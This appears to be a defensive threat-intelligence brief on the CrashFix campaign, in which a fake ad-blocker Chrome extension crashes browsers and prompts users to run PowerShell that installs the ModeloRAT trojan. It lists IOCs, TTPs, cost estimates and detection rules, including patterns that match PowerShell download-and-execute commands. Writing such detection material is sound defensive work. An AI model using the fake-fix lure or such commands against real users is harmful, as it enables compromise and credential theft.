BLUF

 A new variant of the "ClickFix" attack, dubbed CrashFix, uses a malicious Chrome extension (NexShield) impersonating an ad blocker to crash browsers and lure users into executing malicious PowerShell commands that install ModeloRAT.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by the CrashFix malicious Chrome extension campaign targeting domain-joined corporate systems:

·       Low-end total cost: $500K – $1.0M

o   (limited infections, rapid containment, no confirmed data access)

·       Typical expected range: $1.2M – $2.5M

o   (multiple endpoints affected, credential resets, extended investigation)

·       Upper-bound realistic scenarios: $3.0M – $5.0M

o   (broader credential exposure, regulatory review, prolonged remediation)

Key Cost Drivers

·       Number of domain-joined endpoints requiring investigation or reimaging

·       Scope and privilege level of credentials exposed via infected systems

·       Duration of undetected activity prior to containment

·       Strength of browser extension governance and endpoint controls

·       Insurance coverage terms, deductibles, and post-incident premium adjustments

Targeted Sectors

Corporate environments, specifically domain-joined systems.

Countries

·       Global

Date of First Reported Activity

·       Early 2025

Date of Last Reported Activity Update

·       January 19, 2026

APT Names

·       KongTuke.

Associated Criminal Organization Names

·       N/A

IOCs

Extension Name

·       NexShield (impersonating uBlock Origin Lite)

Extension Chrome Web Store URL

·       hxxps[://]chromewebstore[.]google[.]com/detail/nexshield-%E2%80%93-advanced-web/cpcdkmjddocikjdkbbeiaafnpdbdafmi

Developer Email

alaynna6899@gmail.com

Associated Malware Component

·       ModeloRAT (a Python-based remote access trojan)

Behavioral Indicators

·       Forces unexpected browser crashes (CrashFix).

·       Impersonates legitimate ad blockers.

·       Uses malicious service workers

Malware

·       ModeloRAT.

Tools Used in Campaign

·       Malicious Chrome extensions

·       PowerShell

CVEs and CVSS Vectors

·       There have been no CVEs tied to this activity at this time

Nessus ID

·       There have been no CVEs tied to this activity at this time.

Mitigation Data

·       Administrators should block the NexShield extension

·       Implement strict browser extension whitelisting

Malware Names

·       ModeloRAT

Malware Samples

sha256

2672B6688D7B32A90F9153D2FF607D6801E6CBDE61F509ED36D0450745998D58

Malware Name

·       ModeloRAT

Malware Family

·       Python-based Remote Access Trojan (RAT)

Known Decoding Key

·       Uses two-layered encryption for its command-and-control (C2) communication

o   Specific static keys are often obfuscated within its Python codebase to hinder analysis.

Verdict

·       Malicious

o   It is classified as an advanced, fully-featured backdoor targeting corporate environments.

Primary Objectives

·       System Reconnaissance

o   Gathering detailed information about the host and network.

·       Credential and Data Theft

o   Specifically targeting Active Directory environments and sensitive corporate data.

·       Remote Command Execution

o   Providing threat actors with full control over infected systems.

Threat Actor Context

Actor

·       Attributed to KongTuke, a threat actor group active since early 2025.

Targeting

·       Exclusively targets domain-joined hosts, effectively filtering out home users to focus on high-value corporate targets.

Behavior Analysis

·       Infection Chain (CrashFix): Victims are lured via malicious Google Chrome extensions (e.g., NexShield, impersonating uBlock Origin Lite).

·       The extension triggers

o   a browser crash via a denial-of-service loop

o   Prompts the user to run a "fix" (a malicious PowerShell command copied to the clipboard).

Evasion

·       Employs delayed execution (triggering crashes ~1 hour after installation) and anti-analysis measures to bypass sandboxes.

Persistence

·       Establishes persistence on the machine to survive reboots.

Adaptive Beaconing

Features C2 beaconing that adapts based on network connectivity status to maintain stealth.

TTPs

·       T1071.001 Application Layer Protocol: Web Protocols

o   The malware utilizes HTTP/HTTPS for command and control (C2) communications to blend in with legitimate web traffic.

·       T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

o   It establishes persistence by modifying Windows registry keys (such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run) to ensure it executes automatically upon system boot.

·       T1055 Process Injection

o   ModeloRAT often employs process injection to execute malicious code within the memory space of a legitimate process (e.g., explorer.exe or svchost.exe) to evade detection.

·       T1027 Obfuscated Files or Information

o   The malware's payload and configuration files are typically encrypted or obfuscated to hinder static analysis and security software detection.

·       T1113 Screen Capture

o   A primary function of this RAT is the ability to capture screenshots of the victim's desktop for data collection.

·       T1056.001 Input Capture: Keylogging

o   It includes modules for logging keystrokes to steal sensitive information such as credentials and personal messages.

·       T1005 Data from Local System

o   The malware searches for and collects files and data directly from the local system's hard drive for exfiltration.

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE ModeloRAT Checkin"; content:"/api/v1/checkin"; sid:1000001; rev:1;)

SentinelOne

Identify Browser Extensions (NexShield ID)

ObjectType = "File" AND (FilePath contains "cpcdkmjddocikjdkbbeiaafnpdbdafmi")

PowerShell Execution from Clipboard (ClickFix/CrashFix Pattern)

ObjectType = "Process" AND (ProcessName = "powershell.exe") AND (CommandLine contains "Invoke-WebRequest" OR CommandLine contains "IEX" OR CommandLine contains "-enc")

Network Communication to C2 Domains

ObjectType = "DNS" AND (DNSRequest in ("nexsnield.com"))

Splunk

index=windows sourcetype=WinEventLog:Microsoft-Windows-PowerShell/Operational EventCode=4104 "powershell" AND ("clipboard" OR "FromBase64String")

Delivery Method

·       Browser-based luring via fake "fix" prompts after a forced browser crash.

Email Samples

·       Not applicable

References

Security Week

·       hxxps://www.securityweek.com/malicious-chrome-extension-crashes-browser-in-clickfix-variant-crashfix/

VirusTotal

·       hxxps://www.virustotal.com/gui/file/2672b6688d7b32a90f9153d2ff607d6801e6cbde61f509ed36d0450745998d58